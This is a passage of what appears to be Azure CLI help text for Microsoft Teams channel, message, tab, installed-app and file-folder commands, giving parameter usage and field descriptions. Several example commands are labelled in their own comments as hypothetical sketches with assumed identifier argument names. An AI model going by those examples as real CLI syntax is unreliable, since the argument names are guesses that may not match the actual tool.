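      - name: Update the body of a channel message (illustrative; identifier argument names are assumptions)
        text: |-
               az teams team-channel update-message --team-id "{team-id}" --channel-id "{channel-id}" \
--chat-message-id "{message-id}" --body content="Updated announcement text" content-type="text"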
"""
helps['teams team-channel update-tab'] = """
type: command
short-summary: "Update the navigation property tabs in teams."
parameters:
- name: --configuration
short-summary: "teamsTabConfiguration"
long-summary: |
Usage: --configuration content-url=XX entity-id=XX remove-url=XX website-url=XX
content-url: Url used for rendering tab contents in Teams. Required.
entity-id: Identifier for the entity hosted by the tab provider.
remove-url: Url called by Teams client when a Tab is removed using the Teams Client.
website-url: Url for showing tab contents outside of Teams.
- name: --app-definitions
short-summary: "The details for each version of the app."
long-summary: |
Usage: --app-definitions display-name=XX teams-app-id=XX version=XX id=XX
display-name: The name of the app provided by the app developer.
teams-app-id: The ID from the Teams app manifest.
version: The version number of the application.
id: Read-only.
Multiple actions can be specified by using more than one --app-definitions argument.
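    examples:
      # Hypothetical sketch only: the --team-id, --channel-id and --teams-tab-id identifier arguments are assumed from the
      # command path; --configuration follows the key=value usage documented above.
      - name: Update a tab's configuration (illustrative; identifier argument names are assumptions)
        text: |-
               az teams team-channel update-tab --team-id "{team-id}" --channel-id "{channel-id}" \
--teams-tab-id "{tab-id}" --configuration content-url="https://contoso.example/tab" website-url="https://contoso.example" \
entity-id="tab-entity-1"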
"""
helps['teams team-channel-message'] = """
type: group
short-summary: Manage team channel message with teams_v1_0
"""
helps['teams team-channel-message create-hosted-content'] = """
type: command
short-summary: "Create new navigation property to hostedContents for teams."
"""
helps['teams team-channel-message create-reply'] = """
type: command
short-summary: "Create new navigation property to replies for teams."
parameters:
- name: --attachments
short-summary: "Attached files. Attachments are currently read-only – sending attachments is not supported."
long-summary: |
Usage: --attachments content=XX content-type=XX content-url=XX id=XX name=XX thumbnail-url=XX
content: The content of the attachment. If the attachment is a rich card, set the property to the rich \
card object. This property and contentUrl are mutually exclusive.
            content-type: The media type of the content attachment. It can have the following values: reference: \
Attachment is a link to another file. Populate the contentUrl with the link to the object. file: Raw file attachment. \
Populate the contentUrl field with the base64 encoding of the file in data: format. image/: Image type with the type of the \
image specified, for example image/png, image/jpeg, image/gif. Populate the contentUrl field with the base64 encoding of \
the file in data: format. video/: Video type with the format specified, for example video/mp4. Populate the contentUrl \
field with the base64 encoding of the file in data: format. audio/: Audio type with the format specified, for example \
audio/wmw. Populate the contentUrl field with the base64 encoding of the file in data: format. application/card type: Rich \
card attachment type with the card type specifying the exact card format to use. Set content with the JSON format of the \
card. Supported values for card type include: application/vnd.microsoft.card.adaptive: A rich card that can contain any \
combination of text, speech, images, buttons, and input fields. Set the content property to an AdaptiveCard object. \
application/vnd.microsoft.card.animation: A rich card that plays animation. Set the content property to an AnimationCard \
object. application/vnd.microsoft.card.audio: A rich card that plays audio files. Set the content property to an AudioCard \
object. application/vnd.microsoft.card.video: A rich card that plays videos. Set the content property to a VideoCard \
object. application/vnd.microsoft.card.hero: A Hero card. Set the content property to a HeroCard object. \
application/vnd.microsoft.card.thumbnail: A Thumbnail card. Set the content property to a ThumbnailCard object. \
application/vnd.microsoft.com.card.receipt: A Receipt card. Set the content property to a ReceiptCard object. \
application/vnd.microsoft.com.card.signin: A user Sign In card. Set the content property to a SignInCard object.
content-url: URL for the content of the attachment. Supported protocols: http, https, file and data.
id: Read-only. Unique id of the attachment.
name: Name of the attachment.
thumbnail-url: URL to a thumbnail image that the channel can use if it supports using an alternative, \
smaller form of content or contentUrl. For example, if you set contentType to application/word and set contentUrl to \
the location of the Word document, you might include a thumbnail image that represents the document. The channel could \
display the thumbnail image instead of the document. When the user clicks the image, the channel would open the \
document.
Multiple actions can be specified by using more than one --attachments argument.
- name: --body
short-summary: "itemBody"
long-summary: |
Usage: --body content=XX content-type=XX
content: The content of the item.
- name: --hosted-contents
long-summary: |
Usage: --hosted-contents id=XX
id: Read-only.
Multiple actions can be specified by using more than one --hosted-contents argument.
- name: --policy-tip
short-summary: "chatMessagePolicyViolationPolicyTip"
long-summary: |
Usage: --policy-tip compliance-url=XX general-text=XX matched-condition-descriptions=XX
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
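    examples:
      # Hypothetical sketch only: the --team-id, --channel-id and --chat-message-id identifier arguments are assumed from
      # the command path; --body and --attachments follow the key=value usage documented above.
      - name: Reply to a channel message with a file reference attachment (illustrative; identifier argument names are assumptions)
        text: |-
               az teams team-channel-message create-reply --team-id "{team-id}" --channel-id "{channel-id}" \
--chat-message-id "{message-id}" --body content="Please review the attached notes." content-type="text" \
--attachments id="{attachment-id}" content-type="reference" content-url="https://contoso.sharepoint.com/notes.docx" \
name="notes.docx"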
"""
helps['teams team-channel-message delete-hosted-content'] = """
type: command
short-summary: "Delete navigation property hostedContents for teams."
"""
helps['teams team-channel-message delete-reply'] = """
type: command
short-summary: "Delete navigation property replies for teams."
"""
helps['teams team-channel-message list-hosted-content'] = """
type: command
short-summary: "Get hostedContents from teams."
"""
helps['teams team-channel-message list-reply'] = """
type: command
short-summary: "Get replies from teams."
"""
helps['teams team-channel-message show-hosted-content'] = """
type: command
short-summary: "Get hostedContents from teams."
"""
helps['teams team-channel-message show-reply'] = """
type: command
short-summary: "Get replies from teams."
"""
helps['teams team-channel-message update-hosted-content'] = """
type: command
short-summary: "Update the navigation property hostedContents in teams."
"""
helps['teams team-channel-message update-reply'] = """
type: command
short-summary: "Update the navigation property replies in teams."
parameters:
- name: --attachments
short-summary: "Attached files. Attachments are currently read-only – sending attachments is not supported."
long-summary: |
Usage: --attachments content=XX content-type=XX content-url=XX id=XX name=XX thumbnail-url=XX
content: The content of the attachment. If the attachment is a rich card, set the property to the rich \
card object. This property and contentUrl are mutually exclusive.
            content-type: The media type of the content attachment. It can have the following values: reference: \
Attachment is a link to another file. Populate the contentUrl with the link to the object. file: Raw file attachment. \
Populate the contentUrl field with the base64 encoding of the file in data: format. image/: Image type with the type of the \
image specified, for example image/png, image/jpeg, image/gif. Populate the contentUrl field with the base64 encoding of \
the file in data: format. video/: Video type with the format specified, for example video/mp4. Populate the contentUrl \
field with the base64 encoding of the file in data: format. audio/: Audio type with the format specified, for example \
audio/wmw. Populate the contentUrl field with the base64 encoding of the file in data: format. application/card type: Rich \
card attachment type with the card type specifying the exact card format to use. Set content with the JSON format of the \
card. Supported values for card type include: application/vnd.microsoft.card.adaptive: A rich card that can contain any \
combination of text, speech, images, buttons, and input fields. Set the content property to an AdaptiveCard object. \
application/vnd.microsoft.card.animation: A rich card that plays animation. Set the content property to an AnimationCard \
object. application/vnd.microsoft.card.audio: A rich card that plays audio files. Set the content property to an AudioCard \
object. application/vnd.microsoft.card.video: A rich card that plays videos. Set the content property to a VideoCard \
object. application/vnd.microsoft.card.hero: A Hero card. Set the content property to a HeroCard object. \
application/vnd.microsoft.card.thumbnail: A Thumbnail card. Set the content property to a ThumbnailCard object. \
application/vnd.microsoft.com.card.receipt: A Receipt card. Set the content property to a ReceiptCard object. \
application/vnd.microsoft.com.card.signin: A user Sign In card. Set the content property to a SignInCard object.
content-url: URL for the content of the attachment. Supported protocols: http, https, file and data.
id: Read-only. Unique id of the attachment.
name: Name of the attachment.
thumbnail-url: URL to a thumbnail image that the channel can use if it supports using an alternative, \
smaller form of content or contentUrl. For example, if you set contentType to application/word and set contentUrl to \
the location of the Word document, you might include a thumbnail image that represents the document. The channel could \
display the thumbnail image instead of the document. When the user clicks the image, the channel would open the \
document.
Multiple actions can be specified by using more than one --attachments argument.
- name: --body
short-summary: "itemBody"
long-summary: |
Usage: --body content=XX content-type=XX
content: The content of the item.
- name: --hosted-contents
long-summary: |
Usage: --hosted-contents id=XX
id: Read-only.
Multiple actions can be specified by using more than one --hosted-contents argument.
- name: --policy-tip
short-summary: "chatMessagePolicyViolationPolicyTip"
long-summary: |
Usage: --policy-tip compliance-url=XX general-text=XX matched-condition-descriptions=XX
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-channel-tab'] = """
type: group
short-summary: Manage team channel tab with teams_v1_0
"""
helps['teams team-channel-tab delete-ref-team-app'] = """
type: command
short-summary: "Delete ref of navigation property teamsApp for teams."
"""
helps['teams team-channel-tab set-ref-team-app'] = """
type: command
short-summary: "Update the ref of navigation property teamsApp in teams."
"""
helps['teams team-channel-tab show-ref-team-app'] = """
type: command
short-summary: "Get ref of teamsApp from teams."
"""
helps['teams team-channel-tab show-team-app'] = """
type: command
short-summary: "Get teamsApp from teams."
"""
helps['teams team-installed-app'] = """
type: group
short-summary: Manage team installed app with teams_v1_0
"""
helps['teams team-installed-app delete-ref-team-app'] = """
type: command
short-summary: "Delete ref of navigation property teamsApp for teams."
"""
helps['teams team-installed-app delete-ref-team-app-definition'] = """
type: command
short-summary: "Delete ref of navigation property teamsAppDefinition for teams."
"""
helps['teams team-installed-app set-ref-team-app'] = """
type: command
short-summary: "Update the ref of navigation property teamsApp in teams."
"""
helps['teams team-installed-app set-ref-team-app-definition'] = """
type: command
short-summary: "Update the ref of navigation property teamsAppDefinition in teams."
"""
helps['teams team-installed-app show-ref-team-app'] = """
type: command
short-summary: "Get ref of teamsApp from teams."
"""
helps['teams team-installed-app show-ref-team-app-definition'] = """
type: command
short-summary: "Get ref of teamsAppDefinition from teams."
"""
helps['teams team-installed-app show-team-app'] = """
type: command
short-summary: "Get teamsApp from teams."
"""
helps['teams team-installed-app show-team-app-definition'] = """
type: command
short-summary: "Get teamsAppDefinition from teams."
"""
helps['teams team-installed-app upgrade'] = """
type: command
short-summary: "Invoke action upgrade."
"""
helps['teams team-primary-channel'] = """
type: group
short-summary: Manage team primary channel with teams_v1_0
"""
helps['teams team-primary-channel create-member'] = """
type: command
short-summary: "Create new navigation property to members for teams."
"""
helps['teams team-primary-channel create-message'] = """
type: command
short-summary: "Create new navigation property to messages for teams."
parameters:
- name: --attachments
short-summary: "Attached files. Attachments are currently read-only – sending attachments is not supported."
long-summary: |
Usage: --attachments content=XX content-type=XX content-url=XX id=XX name=XX thumbnail-url=XX
content: The content of the attachment. If the attachment is a rich card, set the property to the rich \
card object. This property and contentUrl are mutually exclusive.
            content-type: The media type of the content attachment. It can have the following values: reference: \
Attachment is a link to another file. Populate the contentUrl with the link to the object. file: Raw file attachment. \
Populate the contentUrl field with the base64 encoding of the file in data: format. image/: Image type with the type of the \
image specified, for example image/png, image/jpeg, image/gif. Populate the contentUrl field with the base64 encoding of \
the file in data: format. video/: Video type with the format specified, for example video/mp4. Populate the contentUrl \
field with the base64 encoding of the file in data: format. audio/: Audio type with the format specified, for example \
audio/wmw. Populate the contentUrl field with the base64 encoding of the file in data: format. application/card type: Rich \
card attachment type with the card type specifying the exact card format to use. Set content with the JSON format of the \
card. Supported values for card type include: application/vnd.microsoft.card.adaptive: A rich card that can contain any \
combination of text, speech, images, buttons, and input fields. Set the content property to an AdaptiveCard object. \
application/vnd.microsoft.card.animation: A rich card that plays animation. Set the content property to an AnimationCard \
object. application/vnd.microsoft.card.audio: A rich card that plays audio files. Set the content property to an AudioCard \
object. application/vnd.microsoft.card.video: A rich card that plays videos. Set the content property to a VideoCard \
object. application/vnd.microsoft.card.hero: A Hero card. Set the content property to a HeroCard object. \
application/vnd.microsoft.card.thumbnail: A Thumbnail card. Set the content property to a ThumbnailCard object. \
application/vnd.microsoft.com.card.receipt: A Receipt card. Set the content property to a ReceiptCard object. \
application/vnd.microsoft.com.card.signin: A user Sign In card. Set the content property to a SignInCard object.
content-url: URL for the content of the attachment. Supported protocols: http, https, file and data.
id: Read-only. Unique id of the attachment.
name: Name of the attachment.
thumbnail-url: URL to a thumbnail image that the channel can use if it supports using an alternative, \
smaller form of content or contentUrl. For example, if you set contentType to application/word and set contentUrl to \
the location of the Word document, you might include a thumbnail image that represents the document. The channel could \
display the thumbnail image instead of the document. When the user clicks the image, the channel would open the \
document.
Multiple actions can be specified by using more than one --attachments argument.
- name: --body
short-summary: "itemBody"
long-summary: |
Usage: --body content=XX content-type=XX
content: The content of the item.
- name: --hosted-contents
long-summary: |
Usage: --hosted-contents id=XX
id: Read-only.
Multiple actions can be specified by using more than one --hosted-contents argument.
- name: --policy-tip
short-summary: "chatMessagePolicyViolationPolicyTip"
long-summary: |
Usage: --policy-tip compliance-url=XX general-text=XX matched-condition-descriptions=XX
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
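    examples:
      # Hypothetical sketch only: the --team-id identifier argument is assumed from the command path; --body follows the
      # key=value usage documented above, and repeating --attachments would add multiple attachments.
      - name: Post a message to the primary channel (illustrative; identifier argument name is an assumption)
        text: |-
               az teams team-primary-channel create-message --team-id "{team-id}" --body content="<b>Welcome!</b>" \
content-type="html"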
"""
helps['teams team-primary-channel create-tab'] = """
type: command
short-summary: "Create new navigation property to tabs for teams."
parameters:
- name: --configuration
short-summary: "teamsTabConfiguration"
long-summary: |
Usage: --configuration content-url=XX entity-id=XX remove-url=XX website-url=XX
content-url: Url used for rendering tab contents in Teams. Required.
entity-id: Identifier for the entity hosted by the tab provider.
remove-url: Url called by Teams client when a Tab is removed using the Teams Client.
website-url: Url for showing tab contents outside of Teams.
- name: --app-definitions
short-summary: "The details for each version of the app."
long-summary: |
Usage: --app-definitions display-name=XX teams-app-id=XX version=XX id=XX
display-name: The name of the app provided by the app developer.
teams-app-id: The ID from the Teams app manifest.
version: The version number of the application.
id: Read-only.
Multiple actions can be specified by using more than one --app-definitions argument.
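    examples:
      # Hypothetical sketch only: the --team-id identifier argument is assumed from the command path; --configuration
      # follows the key=value usage documented above.
      - name: Add a website tab to the primary channel (illustrative; identifier argument name is an assumption)
        text: |-
               az teams team-primary-channel create-tab --team-id "{team-id}" --configuration \
content-url="https://contoso.example/dashboard" website-url="https://contoso.example/dashboard"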
"""
helps['teams team-primary-channel delete-file-folder'] = """
type: command
short-summary: "Delete navigation property filesFolder for teams."
"""
helps['teams team-primary-channel delete-member'] = """
type: command
short-summary: "Delete navigation property members for teams."
"""
helps['teams team-primary-channel delete-message'] = """
type: command
short-summary: "Delete navigation property messages for teams."
"""
helps['teams team-primary-channel delete-tab'] = """
type: command
short-summary: "Delete navigation property tabs for teams."
"""
helps['teams team-primary-channel list-member'] = """
type: command
short-summary: "Get members from teams."
"""
helps['teams team-primary-channel list-message'] = """
type: command
short-summary: "Get messages from teams."
"""
helps['teams team-primary-channel list-tab'] = """
type: command
short-summary: "Get tabs from teams."
"""
helps['teams team-primary-channel show-file-folder'] = """
type: command
short-summary: "Get filesFolder from teams."
"""
helps['teams team-primary-channel show-member'] = """
type: command
short-summary: "Get members from teams."
"""
helps['teams team-primary-channel show-message'] = """
type: command
short-summary: "Get messages from teams."
"""
helps['teams team-primary-channel show-tab'] = """
type: command
short-summary: "Get tabs from teams."
"""
helps['teams team-primary-channel update-file-folder'] = """
type: command
short-summary: "Update the navigation property filesFolder in teams."
parameters:
- name: --sharepoint-ids
short-summary: "sharepointIds"
long-summary: |
Usage: --sharepoint-ids list-id=XX list-item-id=XX list-item-unique-id=XX site-id=XX site-url=XX \
tenant-id=XX web-id=XX
list-id: The unique identifier (guid) for the item's list in SharePoint.
list-item-id: An integer identifier for the item within the containing list.
list-item-unique-id: The unique identifier (guid) for the item within OneDrive for Business or a \
SharePoint site.
site-id: The unique identifier (guid) for the item's site collection (SPSite).
site-url: The SharePoint URL for the site that contains the item.
tenant-id: The unique identifier (guid) for the tenancy.
web-id: The unique identifier (guid) for the item's site (SPWeb).
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --microsoft-graph-identity-application
short-summary: "identity"
long-summary: |
Usage: --microsoft-graph-identity-application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --microsoft-graph-identity-device
short-summary: "identity"
long-summary: |
Usage: --microsoft-graph-identity-device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --microsoft-graph-identity-user
short-summary: "identity"
long-summary: |
Usage: --microsoft-graph-identity-user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --audio
short-summary: "audio"
long-summary: |
Usage: --audio album=XX album-artist=XX artist=XX bitrate=XX composers=XX copyright=XX disc=XX \
disc-count=XX duration=XX genre=XX has-drm=XX is-variable-bitrate=XX title=XX track=XX track-count=XX year=XX
album: The title of the album for this audio file.
album-artist: The artist named on the album for the audio file.
artist: The performing artist for the audio file.
bitrate: Bitrate expressed in kbps.
composers: The name of the composer of the audio file.
copyright: Copyright information for the audio file.
disc: The number of the disc this audio file came from.
disc-count: The total number of discs in this album.
            duration: Duration of the audio file, expressed in milliseconds.
genre: The genre of this audio file.
has-drm: Indicates if the file is protected with digital rights management.
is-variable-bitrate: Indicates if the file is encoded with a variable bitrate.
title: The title of the audio file.
track: The number of the track on the original disc for this audio file.
track-count: The total number of tracks on the original disc for this audio file.
year: The year the audio file was recorded.
- name: --file-system-info
short-summary: "fileSystemInfo"
long-summary: |
Usage: --file-system-info created-date-time=XX last-accessed-date-time=XX last-modified-date-time=XX
created-date-time: The UTC date and time the file was created on a client.
last-accessed-date-time: The UTC date and time the file was last accessed. Available for the recent file \
list only.
last-modified-date-time: The UTC date and time the file was last modified on a client.
- name: --image
short-summary: "image"
long-summary: |
Usage: --image height=XX width=XX
height: Optional. Height of the image, in pixels. Read-only.
width: Optional. Width of the image, in pixels. Read-only.
- name: --location
short-summary: "geoCoordinates"
long-summary: |
Usage: --location altitude=XX latitude=XX longitude=XX
altitude: Optional. The altitude (height), in feet, above sea level for the item. Read-only.
latitude: Optional. The latitude, in decimal, for the item. Read-only.
longitude: Optional. The longitude, in decimal, for the item. Read-only.
- name: --photo
short-summary: "photo"
long-summary: |
Usage: --photo camera-make=XX camera-model=XX exposure-denominator=XX exposure-numerator=XX f-number=XX \
focal-length=XX iso=XX orientation=XX taken-date-time=XX
camera-make: Camera manufacturer. Read-only.
camera-model: Camera model. Read-only.
exposure-denominator: The denominator for the exposure time fraction from the camera. Read-only.
exposure-numerator: The numerator for the exposure time fraction from the camera. Read-only.
f-number: The F-stop value from the camera. Read-only.
focal-length: The focal length from the camera. Read-only.
iso: The ISO value from the camera. Read-only.
orientation: The orientation value from the camera. Writable on OneDrive Personal.
taken-date-time: Represents the date and time the photo was taken. Read-only.
- name: --publication
short-summary: "publicationFacet"
long-summary: |
Usage: --publication level=XX version-id=XX
level: The state of publication for this document. Either published or checkout. Read-only.
version-id: The unique identifier for the version that is visible to the current caller. Read-only.
- name: --microsoft-graph-sharepoint-ids
short-summary: "sharepointIds"
long-summary: |
Usage: --microsoft-graph-sharepoint-ids list-id=XX list-item-id=XX list-item-unique-id=XX site-id=XX \
site-url=XX tenant-id=XX web-id=XX
list-id: The unique identifier (guid) for the item's list in SharePoint.
list-item-id: An integer identifier for the item within the containing list.
list-item-unique-id: The unique identifier (guid) for the item within OneDrive for Business or a \
SharePoint site.
site-id: The unique identifier (guid) for the item's site collection (SPSite).
site-url: The SharePoint URL for the site that contains the item.
tenant-id: The unique identifier (guid) for the tenancy.
web-id: The unique identifier (guid) for the item's site (SPWeb).
- name: --video
short-summary: "video"
long-summary: |
Usage: --video audio-bits-per-sample=XX audio-channels=XX audio-format=XX audio-samples-per-second=XX \
bitrate=XX duration=XX four-cc=XX frame-rate=XX height=XX width=XX
audio-bits-per-sample: Number of audio bits per sample.
audio-channels: Number of audio channels.
audio-format: Name of the audio format (AAC, MP3, etc.).
audio-samples-per-second: Number of audio samples per second.
bitrate: Bit rate of the video in bits per second.
duration: Duration of the file in milliseconds.
four-cc: 'Four character code' name of the video format.
frame-rate: Frame rate of the video.
height: Height of the video, in pixels.
width: Width of the video, in pixels.
- name: --subscriptions
short-summary: "The set of subscriptions on the item. Only supported on the root of a drive."
long-summary: |
Usage: --subscriptions application-id=XX change-type=XX client-state=XX creator-id=XX \
encryption-certificate=XX encryption-certificate-id=XX expiration-date-time=XX include-resource-data=XX \
latest-supported-tls-version=XX lifecycle-notification-url=XX notification-url=XX resource=XX id=XX
application-id: Identifier of the application used to create the subscription. Read-only.
change-type: Required. Indicates the type of change in the subscribed resource that will raise a change \
notification. The supported values are: created, updated, deleted. Multiple values can be combined using a \
comma-separated list. Note: Drive root item and list change notifications support only the updated changeType. User and \
group change notifications support updated and deleted changeType.
client-state: Optional. Specifies the value of the clientState property sent by the service in each change \
notification. The maximum length is 128 characters. The client can check that the change notification came from the \
service by comparing the value of the clientState property sent with the subscription with the value of the \
clientState property received with each change notification.
creator-id: Identifier of the user or service principal that created the subscription. If the app used \
delegated permissions to create the subscription, this field contains the id of the signed-in user the app called on \
behalf of. If the app used application permissions, this field contains the id of the service principal corresponding \
to the app. Read-only.
encryption-certificate: A base64-encoded representation of a certificate with a public key used to encrypt \
resource data in change notifications. Optional. Required when includeResourceData is true.
encryption-certificate-id: A custom app-provided identifier to help identify the certificate needed to \
decrypt resource data. Optional.
expiration-date-time: Required. Specifies the date and time when the webhook subscription expires. The \
time is in UTC, and can be an amount of time from subscription creation that varies for the resource subscribed to. \
See the Microsoft Graph subscriptions documentation for the maximum supported subscription length for each resource type.
include-resource-data: When set to true, change notifications include resource data (such as content of a \
chat message). Optional.
notification-url: Required. The URL of the endpoint that will receive the change notifications. This URL \
must make use of the HTTPS protocol.
resource: Required. Specifies the resource that will be monitored for changes. Do not include the base URL \
(https://graph.microsoft.com/v1.0/). See the possible resource path values for each supported resource.
id: Read-only.
Multiple actions can be specified by using more than one --subscriptions argument.
- name: --versions
short-summary: "The list of previous versions of the item. For more info, see [getting previous versions][]. \
Read-only. Nullable."
long-summary: |
Usage: --versions content=XX size=XX last-modified-by=XX last-modified-date-time=XX publication=XX id=XX
content: The content stream for this version of the item.
size: Indicates the size of the content stream for this version of the item.
last-modified-by: identitySet
last-modified-date-time: Date and time the version was last modified. Read-only.
publication: publicationFacet
id: Read-only.
Multiple actions can be specified by using more than one --versions argument.
- name: --sharepoint-ids1
short-summary: "sharepointIds"
long-summary: |
Usage: --sharepoint-ids1 list-id=XX list-item-id=XX list-item-unique-id=XX site-id=XX site-url=XX \
tenant-id=XX web-id=XX
list-id: The unique identifier (guid) for the item's list in SharePoint.
list-item-id: An integer identifier for the item within the containing list.
list-item-unique-id: The unique identifier (guid) for the item within OneDrive for Business or a \
SharePoint site.
site-id: The unique identifier (guid) for the item's site collection (SPSite).
site-url: The SharePoint URL for the site that contains the item.
tenant-id: The unique identifier (guid) for the tenancy.
web-id: The unique identifier (guid) for the item's site (SPWeb).
- name: --application1
short-summary: "identity"
long-summary: |
Usage: --application1 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device1
short-summary: "identity"
long-summary: |
Usage: --device1 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user1
short-summary: "identity"
long-summary: |
Usage: --user1 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --application2
short-summary: "identity"
long-summary: |
Usage: --application2 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device2
short-summary: "identity"
long-summary: |
Usage: --device2 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user2
short-summary: "identity"
long-summary: |
Usage: --user2 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --content-type
short-summary: "contentTypeInfo"
long-summary: |
Usage: --content-type id=XX name=XX
id: The id of the content type.
name: The name of the content type.
- name: --sharepoint-ids2
short-summary: "sharepointIds"
long-summary: |
Usage: --sharepoint-ids2 list-id=XX list-item-id=XX list-item-unique-id=XX site-id=XX site-url=XX \
tenant-id=XX web-id=XX
list-id: The unique identifier (guid) for the item's list in SharePoint.
list-item-id: An integer identifier for the item within the containing list.
list-item-unique-id: The unique identifier (guid) for the item within OneDrive for Business or a \
SharePoint site.
site-id: The unique identifier (guid) for the item's site collection (SPSite).
site-url: The SharePoint URL for the site that contains the item.
tenant-id: The unique identifier (guid) for the tenancy.
web-id: The unique identifier (guid) for the item's site (SPWeb).
- name: --fields
short-summary: "fieldValueSet"
long-summary: |
Usage: --fields id=XX
id: Read-only.
- name: --microsoft-graph-workbook-application
short-summary: "workbookApplication"
long-summary: |
Usage: --microsoft-graph-workbook-application calculation-mode=XX id=XX
calculation-mode: Returns the calculation mode used in the workbook. Possible values are: Automatic, \
AutomaticExceptTables, Manual.
id: Read-only.
- name: --functions
short-summary: "workbookFunctions"
long-summary: |
Usage: --functions id=XX
id: Read-only.
- name: --microsoft-graph-file-system-info-file-system-info
short-summary: "fileSystemInfo"
long-summary: |
Usage: --microsoft-graph-file-system-info-file-system-info created-date-time=XX last-accessed-date-time=XX \
last-modified-date-time=XX
created-date-time: The UTC date and time the file was created on a client.
last-accessed-date-time: The UTC date and time the file was last accessed. Available for the recent file \
list only.
last-modified-date-time: The UTC date and time the file was last modified on a client.
- name: --microsoft-graph-image
short-summary: "image"
long-summary: |
Usage: --microsoft-graph-image height=XX width=XX
height: Optional. Height of the image, in pixels. Read-only.
width: Optional. Width of the image, in pixels. Read-only.
- name: --package
short-summary: "package"
long-summary: |
Usage: --package type=XX
type: A string indicating the type of package. While oneNote is the only currently defined value, you \
should expect other package types to be returned and handle them accordingly.
- name: --sharepoint-ids3
short-summary: "sharepointIds"
long-summary: |
Usage: --sharepoint-ids3 list-id=XX list-item-id=XX list-item-unique-id=XX site-id=XX site-url=XX \
tenant-id=XX web-id=XX
list-id: The unique identifier (guid) for the item's list in SharePoint.
list-item-id: An integer identifier for the item within the containing list.
list-item-unique-id: The unique identifier (guid) for the item within OneDrive for Business or a \
SharePoint site.
site-id: The unique identifier (guid) for the item's site collection (SPSite).
site-url: The SharePoint URL for the site that contains the item.
tenant-id: The unique identifier (guid) for the tenancy.
web-id: The unique identifier (guid) for the item's site (SPWeb).
- name: --special-folder
short-summary: "specialFolder"
